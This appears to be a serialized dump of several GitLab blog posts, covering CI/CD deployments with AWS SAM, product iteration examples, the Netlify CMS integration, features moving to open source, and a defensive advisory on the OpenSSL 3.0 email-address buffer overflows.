It has all the implicit SAM magic expanded into CloudFormation resources. By managing it as an artifact, we can pass it along to further steps in the build pipeline, even though it isn't committed to our repository.\n\n#### Deploy\nOur deployments use AWS CloudFormation to deploy the packaged application in a target AWS environment.\n\nIn development and staging environments, we use the `aws cloudformation deploy` command to create a change set and immediately execute it. In production, we put a manual \"wait\" in the pipeline at this point so you have the opportunity to review the change set before moving onto the \"Execute\" step, which actually calls `aws cloudformation execute-changeset` to update the underlying stack.\n\nOur deployment jobs use a helper script, committed to the top level of the example repository, called `cfn-wait.sh`. This script is needed because the `aws cloudformation` commands don't wait for results; they report success as soon as the stack operation starts. To properly record the deployment results in our job, we need a script that polls the CloudFormation service and throws an error if the deployment or update fails.\n\n## Dynamic feature branch deployments and Review Apps\n\n![Dynamic feature branch deployments and Review Apps](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/dynamic-feature-branch-deployments.png){: .shadow.medium.center}\n\nWhen a non-master branch is pushed to GitLab, our pipeline runs tests, builds the [updated source code](/solutions/source-code-management/), and deploys and/or updates the changed CloudFormation resources in the development AWS account. 
When the branch is merged into master, or if someone clicks the \"Stop\" button next to the branch's environment in GitLab CI, the CloudFormation stack will be torn down automatically.\n\nIt is perfectly possible, and indeed desirable, to have multiple development feature branches simultaneously deployed as live environments for more efficient parallel feature development and QA. The serverless model makes this a cost-effective strategy for collaborating in the cloud.\n\nIf we are dynamically deploying our application on every branch push, we might like to view it as part of our interaction with the GitLab console (such as during a code review). GitLab supports this with a nifty feature called [Review Apps](https://docs.gitlab.com/ee/ci/review_apps/). Review Apps allow you to specify an \"environment\" as part of a deployment job, as seen in our `deploy:dev` job below:\n\n```yaml\ndeploy:dev:\n \u003C\u003C: *deploy_script\n stage: deploy-dev\n dependencies:\n   - build:dev\n variables:\n   \u003C\u003C: *dev_variables\n environment:\n   name: review/$CI_COMMIT_REF_NAME\n   url: https://${CI_COMMIT_REF_NAME}.${DEV_HOSTED_ZONE_NAME}/services\n   on_stop: stop:dev\n only:\n   - branches\n except:\n   - master\n```\n\nThe link specified in the `url` field of the `environment` property will be accessible in the `Environments` section of GitLab CI/CD or on any merge request of the associated branch. (In the case of the sample SAM application provided with our example, since we don't have a front end to view, the link just takes you to a GET request for the `/services` API endpoint and should display some raw JSON in your browser.)\n\n![Link to live environment](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/link-live-environment.png){: .shadow.medium.center}\n\nThe `on_stop` property specifies what happens when you \"shut down\" the environment in GitLab CI. This can be done manually or by deleting the associated branch. 
In the case above, we have stopped behavior for dev environments linked to a separate job called `stop:dev`:\n\n```yaml\nstop:dev:\n stage: deploy-dev\n variables:\n   GIT_STRATEGY: none\n   \u003C\u003C: *dev_variables\n \u003C\u003C: *shutdown_script\n when: manual\n environment:\n   name: review/$CI_COMMIT_REF_NAME\n   action: stop\n only:\n   - branches\n except:\n   - master\n```\n\nThis job launches the `shutdown_script` script, which calls `aws cloudformation teardown` to clean up the SAM deployment.\n\nFor safety's sake, there is no automated teardown of staging or production environments.\n\n## Production releases\n\n![Production releases](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/production-releases.png){: .shadow.medium.center}\n\nWhen a change is merged into the master branch, the code is built, tested (including dependency scans) and deployed to the staging environment. This is a separate, stable environment that developers, QA, and others can use to verify changes before attempting to deploy in production.\n\n![Staging environment](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/staging-environment.png){: .shadow.medium.center}\n\nAfter deploying code to the staging environment, the pipeline will create a change set for the production stack, and then pause for a manual intervention. A human user must click a button in the Gitlab CI/CD \"Environments\" view to execute the final change set.\n\n## Now what?\n\nStep back and take a deep breath – that was a lot of information! Let's not lose sight of what we've done here: we've defined a secure, multi-account AWS deployment pipeline in our GitLab repo, integrated tests, builds and deployments, and successfully rolled a SAM-defined serverless app to the cloud. Not bad for a few lines of config!\n\nThe next step is to try this on your own. 
If you'd like to start with our sample \"AWS News\" application, you can simply run `sam init --location git+https://gitlab.com/gitlab-examples/aws-sam` to download the project on your local machine. The AWS News app contains a stripped-down, single-account version of the `gitlab-ci.yml` file discussed in this post, so you can try out deployments with minimal setup needed.\n\n## Further reading\n\nWe have barely scratched the surface of GitLab CI/CD and AWS SAM in this post. Here are some interesting readings if you would like to take your work to the next level:\n\n### SAM\n\n- [Implementing safe AWS Lambda deployments with AWS SAM and CodeDeploy](https://aws.amazon.com/blogs/compute/implementing-safe-aws-lambda-deployments-with-aws-codedeploy/)\n- [Running and debugging serverless applications locally using the AWS SAM CLI](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-test-and-debug.html)\n\n### GitLab CI\n\n- [Setting up a GitLab Runner on EC2](https://hackernoon.com/configuring-gitlab-ci-on-aws-ec2-using-docker-7c359d513a46)\n- [Scheduled pipelines](https://docs.gitlab.com/ee/ci/pipelines/schedules.html)\n- [ChatOps](https://docs.gitlab.com/ee/ci/chatops/)\n\nPlease [let me know](https://twitter.com/forrestbrazeal) if you have further questions!\n\n### About the guest author\n\nForrest Brazeal is an [AWS Serverless Hero](https://aws.amazon.com/developer/community/heroes/forrest-brazeal/). He currently works as a senior cloud architect at [Trek10](https://trek10.com), an AWS Advanced Consulting Partner. 
You can [read more about Trek10's GitLab journey here](/customers/trek10/).\n",[109,1037,231,9,1802,910],{"slug":4044,"featured":6,"template":689},"multi-account-aws-sam-deployments-with-gitlab-ci","content:en-us:blog:multi-account-aws-sam-deployments-with-gitlab-ci.yml","Multi Account Aws Sam Deployments With Gitlab Ci","en-us/blog/multi-account-aws-sam-deployments-with-gitlab-ci.yml","en-us/blog/multi-account-aws-sam-deployments-with-gitlab-ci",{"_path":4050,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4051,"content":4057,"config":4063,"_id":4065,"_type":14,"title":4066,"_source":16,"_file":4067,"_stem":4068,"_extension":19},"/en-us/blog/mvcs-with-big-results",{"title":4052,"description":4053,"ogTitle":4052,"ogDescription":4053,"noIndex":6,"ogImage":4054,"ogUrl":4055,"ogSiteName":673,"ogType":674,"canonicalUrls":4055,"schema":4056},"4 Examples of MVCs with big results","Small change, big impact. Here are four recent tweaks to GitLab which exemplify our value of iteration.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678764/Blog/Hero%20Images/mvcs-big-results.jpg","https://about.gitlab.com/blog/mvcs-with-big-results","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"4 Examples of MVCs with big results\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Victor Wu\"}],\n        \"datePublished\": \"2018-09-07\",\n      }",{"title":4052,"description":4053,"authors":4058,"heroImage":4054,"date":4060,"body":4061,"category":299,"tags":4062},[4059],"Victor Wu","2018-09-07","\nIteration is [one of our values](https://handbook.gitlab.com/handbook/values/#iteration), and it's often the hardest to stick to. It’s difficult to determine the smallest feature or update that will still bring additional value to users. 
The benefit is that we can ship quickly and get feedback from GitLab users within days or weeks, instead of months or quarters.\n\nAt GitLab we practice iteration by shipping Minimally Viable Changes (MVCs). This can be a new feature scoped to a small functionality, or incremental improvements on it thereafter. Read more about MVC in our [Product handbook](/handbook/product/product-principles/#the-minimal-viable-change-mvc).\n\nDespite being small, these new features often nonetheless have a big impact. Here are some of our recent MVCs that did just that:\n\n## 1. Function: Assignee lists and milestone lists\n\nIntroduced in 11.1, [issue board assignee lists](/releases/2018/06/22/gitlab-11-0-released/#issue-board-assignee-lists) offer a way to monitor team bandwidth right within your issue board, by showing all issues assigned to a specific user. See [4 ways to use GitLab Issue Boards](/blog/4-ways-to-use-gitlab-issue-boards/#3-team-visibility-with-assignee-lists) for more details, and [check out the documentation for assignee lists here](https://docs.gitlab.com/ee/user/project/issue_board.html#assignee-lists).\n\nIn 11.2, we added [milestone lists](/releases/2018/08/22/gitlab-11-2-released/#issue-board-milestone-lists) to allow you to view all issues assigned to a specific milestone. With this visibility, you can move issues across different milestones easily to balance [issue weight](/releases/2018/08/22/gitlab-11-2-released/#summed-weights-in-issue-board-list). View [the documentation for milestone lists here](https://docs.gitlab.com/ee/user/project/issue_board.html#milestone-lists).\n\n## 2. Design: Merge request widget info and pipeline sections redesign\n\nSometimes it's not new functionality that makes a big difference, but just changing how you view it. 
In 11.1, we [tweaked the design of the information and pipeline sections](/releases/2018/07/22/gitlab-11-1-released/#merge-request-widget-info-and-pipeline-sections-redesign) in a [merge request](https://docs.gitlab.com/ee/user/project/merge_requests/), making them easier to digest.\n\n![Merge request redesign](https://about.gitlab.com/images/11_1/mr-widget-info-pipeline.png){: .shadow.medium.center}\n\n## 3. Navigation: Groups dropdown\n\nAlso in 11.1, we made it easier to switch between groups and avoid disruption to your workflow by adding a [dropdown to the groups link in the top navigation](/releases/2018/07/22/gitlab-11-1-released/#groups-dropdown-in-navigation). There's no need to navigate away from your work, and your frequently visited groups are handily displayed for quick access.\n\n## 4. Shortcut: Confidential issue quick action\n\n[Quick actions](https://docs.gitlab.com/ee/user/project/quick_actions.html) make your GitLab life easier and are easy to contribute! As of 11.1 you can quickly and easily [mark an issue confidential right from the comment field](/releases/2018/07/22/gitlab-11-1-released/#confidential-issue-quick-action), thanks to a community contribution.\n\nInspired to contribute an MVC yourself? Find out [how to start contributing to GitLab](/community/contribute/). 
You can also check out some more [MVCs coming up in 11.3](/blog/epics-roadmap/).\n\nPhoto by [Ravali Yan](https://unsplash.com/photos/fleZeABaSWY?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/upwards?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[1099,803,9],{"slug":4064,"featured":6,"template":689},"mvcs-with-big-results","content:en-us:blog:mvcs-with-big-results.yml","Mvcs With Big Results","en-us/blog/mvcs-with-big-results.yml","en-us/blog/mvcs-with-big-results",{"_path":4070,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4071,"content":4077,"config":4082,"_id":4084,"_type":14,"title":4085,"_source":16,"_file":4086,"_stem":4087,"_extension":19},"/en-us/blog/netlify-launches-gitlab-support",{"title":4072,"description":4073,"ogTitle":4072,"ogDescription":4073,"noIndex":6,"ogImage":4074,"ogUrl":4075,"ogSiteName":673,"ogType":674,"canonicalUrls":4075,"schema":4076},"Netlify CMS launches support for GitLab","Make it even easier to bring developers and content creators together, so everyone can contribute.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671196/Blog/Hero%20Images/gitlab-netlify-cover.png","https://about.gitlab.com/blog/netlify-launches-gitlab-support","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Netlify CMS launches support for GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-06-13\",\n      }",{"title":4072,"description":4073,"authors":4078,"heroImage":4074,"date":4079,"body":4080,"category":299,"tags":4081},[1859],"2018-06-13","\n\nMaking it possible that “[everyone can contribute](/company/mission/#mission)” is our mission, and any development that brings us closer to it is great news! 
That’s why we’re happy to tell you that open source content management system [Netlify CMS](https://www.netlify.com/) is [launching support for GitLab as a back end](https://www.netlifycms.org/blog/2018/06/netlify-cms-now-supports-gitlab-as-a-backend/) today.\n\nAs more developers move to static site generators to pre-build their site’s front end for a more reliable, secure, and fast site experience, it’s important that other team members are empowered to contribute to site content easily. While [all GitLab team-members learn to contribute to this very site using GitLab itself](/blog/people-ops-using-gitlab/), most non-technical folks are accustomed to a CMS with a familiar user interface and a WYSIWYG. A simple UI wrapper for your Git repository, Netlify CMS automatically syncs all content edits made through its UI to the repository, so changes are treated in exactly the same way as code (including versioning, rollbacks, continuous deployment, and so on).\n\nThis is one of Netlify CMS’ most highly requested integrations, so much so that the plan to make it happen it is responsible for their project’s single largest contributor coming on board! GitLab users can now take advantage of the integration to simplify publishing with any SSG. Check out how it works:\n\n![Netlify CMS GitLab integration demo](https://about.gitlab.com/images/blogimages/gitlab-netlifycms-gif.gif){: .shadow.medium.center}\n\n1. An editor makes a change in the Netlify CMS\n2. That change automatically syncs to your GitLab repository\n3. And that action triggers a build to your published site\n\nReady to give it a spin? The easiest way to get started is to click on the button below: it'll automatically deploy a Netlify CMS template to a GitLab repository. It's prepackaged with the Hugo static site generator and deploys to Netlify so you can see a real, working site right away. You can also check out [the documentation](https://www.netlifycms.org/docs/start-with-a-template/). 
Enjoy!\n\n\u003Ca href=\"https://app.netlify.com/start/deploy?repository=https://gitlab.com/netlify-templates/one-click-hugo-cms&stack=cms\" rel=\"nofollow noreferrer noopener\" target=\"_blank\">\u003Cimg src=\"https://www.netlify.com/img/deploy/button.svg\" alt=\"Deploy to Netlify\">\u003C/a>\n",[231,9],{"slug":4083,"featured":6,"template":689},"netlify-launches-gitlab-support","content:en-us:blog:netlify-launches-gitlab-support.yml","Netlify Launches Gitlab Support","en-us/blog/netlify-launches-gitlab-support.yml","en-us/blog/netlify-launches-gitlab-support",{"_path":4089,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4090,"content":4096,"config":4101,"_id":4103,"_type":14,"title":4104,"_source":16,"_file":4105,"_stem":4106,"_extension":19},"/en-us/blog/new-features-to-core",{"title":4091,"description":4092,"ogTitle":4091,"ogDescription":4092,"noIndex":6,"ogImage":4093,"ogUrl":4094,"ogSiteName":673,"ogType":674,"canonicalUrls":4094,"schema":4095},"18 GitLab features are moving to open source","We're open sourcing rich functionality across Plan, Create, Verify, Package, Release, Configure, and Protect.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667021/Blog/Hero%20Images/newnature_cropped.png","https://about.gitlab.com/blog/new-features-to-core","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"18 GitLab features are moving to open source\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2020-03-30\",\n      }",{"title":4091,"description":4092,"authors":4097,"heroImage":4093,"date":4098,"body":4099,"category":930,"tags":4100},[1235],"2020-03-30","I spent some time reviewing GitLab features and determined that, by our [Buyer-Based Open Core](/company/pricing/#the-likely-type-of-buyer-determines-what-features-go-in-what-tier) model, eighteen features that appear in seven different stages of the 
[DevOps lifecycle](/topics/devops/) ought to be open source.\n\nWhen we rolled out our Buyer-Based Open Core model in 2018, what we laid out is that features are assigned to each of our four individual tiers based on who the buyer of the feature is.\nFeatures that serve an individual contributor land in Core/Free.\nFeatures for managers land in Starter/Bronze, for directors in Premium/Silver, and executives in Ultimate/Gold.\nAs we explain the reasoning on [our pricing page](/company/pricing/#the-likely-type-of-buyer-determines-what-features-go-in-what-tier),\n> The feature is put in the plan based on what champion is most likely to **care** about it.\n> Buyers make sense, since a higher-cost plan needs a higher-placed buyer.\n\nThis pricing model has served us well, and we've been committed to it.\nBut, somewhere along the way, we failed to do an audit of many existing features.\nThat's what I did last month, and now I'm excited to share that after personally reviewing all features in each of our tiers **we are open sourcing an unprecedented number of GitLab features**.\n\nThis marks a major milestone in our efforts to empower the community to collaborate more robustly and to take our single tool for the DevOps lifecycle to the next level.\nFrom design management to package managers, managing multiple Kubernetes clusters to connecting related issues, we're making it easier than ever for an individual contributor to have everything they need to plan, build, deploy, and secure their application with GitLab.\n\n## It's not enough to talk the talk – we need to walk the walk.\n\nIf we're saying that [our features are based on the buyer](/company/pricing/#four-tiers), then we need to make sure that the right features are in the right place.\nWe've always been committed to our [stewardship](/company/stewardship/#how-open-source-benefits-from-open-core) of GitLab as an open source project.\nBy auditing the tier of features, we can better serve our open source community 
while more accurately aligning our business model.\nOur commitment to the open source community is why we will always work to [move features down our tiers](/company/pricing/#well-always-move-features-down)\nand [doing so quickly](/company/pricing/#if-a-feature-can-be-moved-down-do-it-quickly) and consistently.\n\n## We hope to unleash the power of everyone’s creativity\n\nOur mission has always been that [everyone can contribute](/company/mission/#mission).\nWith new functionality available to all users, it's easier than ever to contribute - contribute with GitLab, contribute to GitLab the application, or contribute to GitLab the company.\nSee something, submit a Merge Request (MR).\n\nWe recognize that many users in our community have creative ideas on how to make GitLab an even better product.\nBy partnering with the open-source community, we can open-source features even more quickly.\n\n## What's moving?\n\n![devops lifecycle](https://about.gitlab.com/images/blogimages/dev-ops-plan-to-monitor.png){: .medium.center}\n\nFeatures from Plan, Create, Verify, Package, Release, Configure, and Protect are moving.\nThis is *a lot* of features.\nWhile we've outlined all of these features that are ready to be moved to Core/Free, we need your help to move them.\n\nThe work to move the actual code to the open source part of the codebase is defined in issues that are linked from this blog post. 
These issues will go into the backlog for each of the respective product development teams and will be prioritized against new feature development.\nIf having this functionality in Core/Free is important to you, we invite you to contribute yourself to speed up the process.\nWe're not just giving you permission to help us move this code - we're asking you to help us move it.\n\n#### Synchronize collaboration with [Plan](/pricing/feature-comparison/)\n\n[Issues](https://docs.gitlab.com/ee/user/project/issues/) are the primary way people collaborate on ideas and plan work in GitLab.\nBy open sourcing these new features, we're making it easier than ever to plan your projects.\nWe can't wait to see what you come up with.\n* [Related issues](https://docs.gitlab.com/ee/user/project/issues/related_issues.html#related-issues): Connect related issues together.\n* [Export issues](https://docs.gitlab.com/ee/user/project/issues/csv_export.html): Export issues from GitLab as a CSV and receive the CSV as an attachment to your default notification email.\n* [Issue board focus mode](https://docs.gitlab.com/ee/user/project/issue_board.html#focus-mode): Use this tool to plan, organize, and visualize a workflow for a feature or product release. 
It can be used as a Kanban or a Scrum board.\n\n[Service desk](https://docs.gitlab.com/ee/user/project/service_desk.html) allows your team to connect directly with any external party through email right inside of GitLab –\nno external tools required.\nWith that, the complexity and inefficiencies of multiple tools are eliminated, significantly shortening the cycle time from feedback to software updates.\nWe would love to hear how you leverage service desk in your workflows now that it's open source.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Related issues         | [gitlab-org/gitlab#212329](https://gitlab.com/gitlab-org/gitlab/-/issues/212329) |\n| Export issues          | [gitlab-org/gitlab#212330](https://gitlab.com/gitlab-org/gitlab/-/issues/212330) |\n| Issue board focus mode | [gitlab-org/gitlab#212331](https://gitlab.com/gitlab-org/gitlab/-/issues/212331) |\n| Service desk           | [gitlab-org/gitlab#212332](https://gitlab.com/gitlab-org/gitlab/-/issues/212332) |\n\n#### Build better code and branch powerfully with [Create](/pricing/feature-comparison/)\n\nThe machine you're using shouldn't limit how easy it is to develop.\n\nWe're excited to bring down two features for developing in web-first environments.\n* The [Web Terminal for Web IDE](https://docs.gitlab.com/ee/user/project/web_ide/index.html#interactive-web-terminals-for-the-web-ide) makes it faster and easier to contribute changes to projects.\n* [File syncing to web terminal](https://docs.gitlab.com/ee/user/project/web_ide/#file-syncing-to-web-terminal) in the Web IDE helps you test code changes in a preconfigured terminal environment.\n\n[Design management](https://docs.gitlab.com/ee/user/project/issues/design_management.html#design-management) allows you to upload design assets (wireframes, mockups, etc.) 
to GitLab issues and keep them stored in one single place, accessed by the Design management’s page within an issue, ensuring issues are the single source of truth for everything required to develop a feature.\n\nAll together, these changes to create should make it easier to go from wireframe to MVC in the blink of an eye – independent of what machine you're on – improving project efficiency.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Web Terminal for Web IDE | [gitlab-org/gitlab#211685](https://gitlab.com/gitlab-org/gitlab/-/issues/211685) |\n| File syncing to the web terminal | [gitlab-org/gitlab#211686](https://gitlab.com/gitlab-org/gitlab/-/issues/211686) |\n| Design Management | [gitlab-org/gitlab#212566](https://gitlab.com/gitlab-org/gitlab/-/issues/212566) |\n\n#### Bring code quality to new heights with [Verify](/pricing/feature-comparison/)\n\n[Code quality](https://docs.gitlab.com/ee/ci/testing/code_quality.html) reports on MRs will be open source.\nKeeping your project’s code simple, readable, and easy to contribute to is difficult.\nCode quality on MRs makes this easier to do and maintain.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Code quality | [gitlab-org/gitlab#212499](https://gitlab.com/gitlab-org/gitlab/-/issues/212499) |\n\n#### Build and share packages in [Package](/pricing/feature-comparison/)\n\nWe're delivering a set of package managers so all your packages can stay in one place:\n* [Conan (C/C++) repository](https://docs.gitlab.com/ee/user/packages/conan_repository/)\n* [Maven (Java) repository](https://docs.gitlab.com/ee/user/packages/maven_repository/index.html)\n* [NPM (node) registry](https://docs.gitlab.com/ee/user/packages/npm_registry/index.html)\n* [NuGet (.NET) repository](https://docs.gitlab.com/ee/user/packages/nuget_repository/)\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Package Managers 
| [gitlab-org&2867](https://gitlab.com/groups/gitlab-org/-/epics/2867) |\n\n#### Continuous delivery is simpler with [Release](/pricing/feature-comparison/)\n\nWith **four** incredible [Release](/pricing/feature-comparison/) features moving to Core/Free, you can be so confident in your releases that you deploy on Fridays (YMMV).\n\n* [Canary deployments](https://docs.gitlab.com/ee/user/project/canary_deployments.html) roll out the new version of your application to a small portion of your fleet.\n* [Incremental rollout](https://docs.gitlab.com/ee/topics/autodevops/index.html#incremental-rollout-to-production) allows you to first check how the new version of your application is behaving before increasing the rollout to 100%.\n* [Feature flags](https://docs.gitlab.com/ee/operations/feature_flags.html) allow you to ship a project in different flavors by dynamically toggling certain functionality.\n* [Deploy boards](https://docs.gitlab.com/ee/user/project/deploy_boards.html) offer a consolidated view of the current health and status of each CI environment running on Kubernetes. 
You can see the progress and status of a rollout, pod by pod, within your existing workflows without having to access Kubernetes.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Canary deployments     | [gitlab-org/gitlab#212319](https://gitlab.com/gitlab-org/gitlab/-/issues/212319) |\n| Incremental rollout    | [gitlab-org/gitlab#212316](https://gitlab.com/gitlab-org/gitlab/-/issues/212316) |\n| Feature flags          | [gitlab-org/gitlab#212318](https://gitlab.com/gitlab-org/gitlab/-/issues/212318) |\n| Deploy boards          | [gitlab-org/gitlab#212320](https://gitlab.com/gitlab-org/gitlab/-/issues/212320) |\n\n#### Support for multiple Kubernetes clusters in [Configure](/pricing/feature-comparison/)\n\nWith support for [multiple Kubernetes clusters](https://docs.gitlab.com/ee/user/project/clusters/#multiple-kubernetes-clusters), you will be able to easily deploy different environments, like Staging and Production, to different Kubernetes clusters.\nThis allows you to enforce strict data separation.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Support for multiple Kubernetes clusters | [gitlab-org/gitlab#212229](https://gitlab.com/gitlab-org/gitlab/-/issues/212229) |\n\n#### Bolster application security with [Protect](/pricing/feature-comparison/)\n\nProtect your apps and infrastructure from security intrusions.\n[Network policies for container network security](https://docs.gitlab.com/ee/update/removals.html) will be available to all users.\nWith that, you can install network policies into GitLab-managed Kubernetes clusters to limit communication between Kubernetes pods.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Network policies for container network security | [gitlab-org/gitlab#212571](https://gitlab.com/gitlab-org/gitlab/-/issues/212571) |\n\nWe hope that by open sourcing these features we will make it easier for all users 
to treat GitLab as a single application for the entire DevOps lifecycle. **We are thrilled about the limitless possibilities ahead of us as a community and we're looking forward to collaborating closely with each of you!**\n\nCover image by [Rodrigo Soares](https://unsplash.com/@rodi01?utm_medium=referral&amp;utm_campaign=photographer-credit&amp;utm_content=creditBadge) on [Unsplash](https://unsplash.com/photos/c6SciRp2kaQ?modal=%7B%22tag%22%3A%22CreditBadge%22%2C%22value%22%3A%7B%22userId%22%3A%22Tq225eP_V5M%22%7D%7D)",[685,9],{"slug":4102,"featured":6,"template":689},"new-features-to-core","content:en-us:blog:new-features-to-core.yml","New Features To Core","en-us/blog/new-features-to-core.yml","en-us/blog/new-features-to-core",{"_path":4108,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4109,"content":4114,"config":4120,"_id":4122,"_type":14,"title":4123,"_source":16,"_file":4124,"_stem":4125,"_extension":19},"/en-us/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them",{"title":4110,"description":4111,"ogTitle":4110,"ogDescription":4111,"noIndex":6,"ogImage":3063,"ogUrl":4112,"ogSiteName":673,"ogType":674,"canonicalUrls":4112,"schema":4113},"New OpenSSL 3.0 vulnerabilities: What you need to know to find and fix them","Learn how to identify your risk for CVE-2022-3786 and CVE-2022-3602.","https://about.gitlab.com/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"New OpenSSL 3.0 vulnerabilities: What you need to know to find and fix them\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab Security Team\"}],\n        \"datePublished\": \"2022-11-01\",\n      }",{"title":4110,"description":4111,"authors":4115,"heroImage":3063,"date":4117,"body":4118,"category":865,"tags":4119},[4116],"GitLab Security Team","2022-11-01","\n\nThe OpenSSL Project [announced two 
vulnerabilities](https://www.openssl.org/blog/blog/email-address-overflows/) found in OpenSSL 3.0-3.0.6 ([first released in September 2021](https://www.openssl.org/blog/blog/OpenSSL3.Final/)). CVE-2022-3786 and CVE-2022-3602 both relate to X.509 email address buffer overflows and require users to upgrade to OpenSSL 3.0.7, which includes patches for the vulnerabilities, which were downgraded from “critical” to “high.”\n\nOpenSSL is an open-source library used by applications to secure communications over the internet with the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols.\n\n## What are the OpenSSL 3.0 vulnerabilities?\n\nCVE-2022-3786 concerns an X.509 email address variable length buffer overflow that can result in a denial of service attack. CVE-2022-3602 concerns X.509 email address 4-byte buffer overflow that could result in a denial of service that could potentially escalate to remote code execution under specific circumstances (the circumstances were not detailed).\n\nCVE-2022-3602 was initially announced by the OpenSSL Project as a critical severity vulnerability, but was downgraded to high severity due to unlikely exploitation in “common conditions.”\n\n## How do the vulnerabilities work?\n\nAccording to the [OpenSSL bulletin](https://www.openssl.org/news/secadv/20221101.txt): “A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs\nafter certificate chain signature verification and requires either a\nCA to have signed the malicious certificate or for the application to\ncontinue certificate verification despite failure to construct a path\nto a trusted issuer. An attacker can craft a malicious email address\nto overflow four attacker-controlled bytes on the stack. 
This buffer\noverflow could result in a crash (causing a denial of service) or\npotentially remote code execution.\n\n\"Many platforms implement stack overflow protections which would mitigate\nagainst the risk of remote code execution. The risk may be further\nmitigated based on stack layout for any given platform/compiler...\n\n\"In a TLS client, this can be triggered by connecting to a malicious\nserver. In a TLS server, this can be triggered if the server requests\nclient authentication and a malicious client connects.”\n\n## Is your organization at risk?\n\nOnly applications that use OpenSSL 3.0 are at risk. To assess if your software supply chain is vulnerable, use GitLab’s [dependency scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/) and [container scanning](https://docs.gitlab.com/ee/user/application_security/container_scanning/).\n\nAccording to the [OpenSSL Security Team](https://www.openssl.org/blog/blog/email-address-overflows/): “The bugs were introduced as part of punycode decoding functionality (currently only used for processing email address name constraints in X.509 certificates). This code was first introduced in OpenSSL 3.0.0. OpenSSL 1.0.2, 1.1.1, and other earlier versions are not affected.”\n\n## Is GitLab vulnerable?\n\nWe have investigated and, as of now, we have found that none of our production systems were impacted by the vulnerability. \n\nHowever, our Dynamic Application Security Testing ([DAST](https://docs.gitlab.com/ee/user/application_security/dast/)) analyzer included the vulnerable library, which we have patched in [DAST v3.0.32](https://gitlab.com/gitlab-org/security-products/dast/-/releases/v3.0.32). Self-managed customers that are using our built-in DAST CI template after 15.0 can get the latest release from `registry.gitlab.com`. If using [the `always` pull policy](https://docs.gitlab.com/runner/executors/docker.html#using-the-always-pull-policy) the update will occur automatically. 
GitLab.com is already running the updated DAST scanner.\n\n## How to mitigate the vulnerability risk\n\nTo fix the flaws found in OpenSSL 3.0, organizations must upgrade to OpenSSL 3.0.7.\n\n",[865,9,930],{"slug":4121,"featured":6,"template":689},"new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them","content:en-us:blog:new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them.yml","New Openssl 30 Vulnerabilities What You Need To Know To Find And Fix Them","en-us/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them.yml","en-us/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them",{"_path":4127,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4128,"content":4134,"config":4143,"_id":4145,"_type":14,"title":4146,"_source":16,"_file":4147,"_stem":4148,"_extension":19},"/en-us/blog/new-typefaces-in-gitlab",{"title":4129,"description":4130,"ogTitle":4129,"ogDescription":4130,"noIndex":6,"ogImage":4131,"ogUrl":4132,"ogSiteName":673,"ogType":674,"canonicalUrls":4132,"schema":4133},"Get to know the new GitLab typefaces","Dive deep into the considerations for changing to GitLab Sans (Inter) and JetBrains Mono, including improved readability.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669926/Blog/Hero%20Images/Cover3.png","https://about.gitlab.com/blog/new-typefaces-in-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Get to know the new GitLab typefaces\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sascha Eggenberger\"},{\"@type\":\"Person\",\"name\":\"Jeremy Elder\"}],\n        \"datePublished\": \"2023-01-17\",\n      }",{"title":4129,"description":4130,"authors":4135,"heroImage":4131,"date":4138,"body":4139,"category":930,"tags":4140},[4136,4137],"Sascha Eggenberger","Jeremy Elder","2023-01-17","\nWe take the choice of typefaces very seriously around here. 
